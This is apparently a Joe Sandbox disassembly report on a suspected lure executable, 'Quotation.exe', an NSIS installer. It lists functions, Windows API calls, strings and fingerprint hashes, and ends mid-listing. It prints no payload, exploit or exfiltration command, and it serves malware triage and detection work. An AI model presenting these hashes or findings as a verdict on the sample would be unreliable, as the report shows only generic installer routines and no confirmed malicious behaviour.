Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A50
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B

Strings

a, xrefs: 00406A49
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
n, xrefs: 00406A42
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3489432095
Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5
UXTHEME, xrefs: 004068C4, 004068D1, 004068DC

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
GetLastError.KERNEL32 ref: 00405E67
SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
GetLastError.KERNEL32 ref: 00405E8E

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
RegCloseKey.KERNELBASE(?), ref: 004069A7

Strings

Call, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00405852

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

OleUninitialize.OLE32(00000404,00000000), ref: 0040589E

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Inklinerede Setup: Installing, xrefs: 00405842

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Inklinerede Setup: Installing
API String ID: 1011633862-1772282993
Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
GetLastError.KERNEL32 ref: 00405E0E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-297319885
Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8

Function 6FF8167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A44
Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A4A
Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A50

GlobalFree.KERNEL32(00000000), ref: 6FF81738
FreeLibrary.KERNEL32(?), ref: 6FF817C3
GlobalFree.KERNEL32(00000000), ref: 6FF817E9

Part of subcall function 6FF81FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF81FFA

Part of subcall function 6FF817F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FF81708,00000000), ref: 6FF8189A

Part of subcall function 6FF81F1E: wsprintfW.USER32 ref: 6FF81F51

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
Instruction ID: c6dd1827c295a0579d783a89fe0c2cbc59a821cb11c1c30bda7c5a9ab590f1ed
Opcode Fuzzy Hash: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
Instruction Fuzzy Hash: 4541A232404349AFDB209F68D944BDE37F8BF02325F00421EF97D9A296DB79B544C651

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C

Function 00406616 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
String ID:
API String ID: 1879705256-0
Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D

Function 004066B4 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
CloseHandle.KERNEL32(?), ref: 004066EA

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79

Function 004068F9 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
